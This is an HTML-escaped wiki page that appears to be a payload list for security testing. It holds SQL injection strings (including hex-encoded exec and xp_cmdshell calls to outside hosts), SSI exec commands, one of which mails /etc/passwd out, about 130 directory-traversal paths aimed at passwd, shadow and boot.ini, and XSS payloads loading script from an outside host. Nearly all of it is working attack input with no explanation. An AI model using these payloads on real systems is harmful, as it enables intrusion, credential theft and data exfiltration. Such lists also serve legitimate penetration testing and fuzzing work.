(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
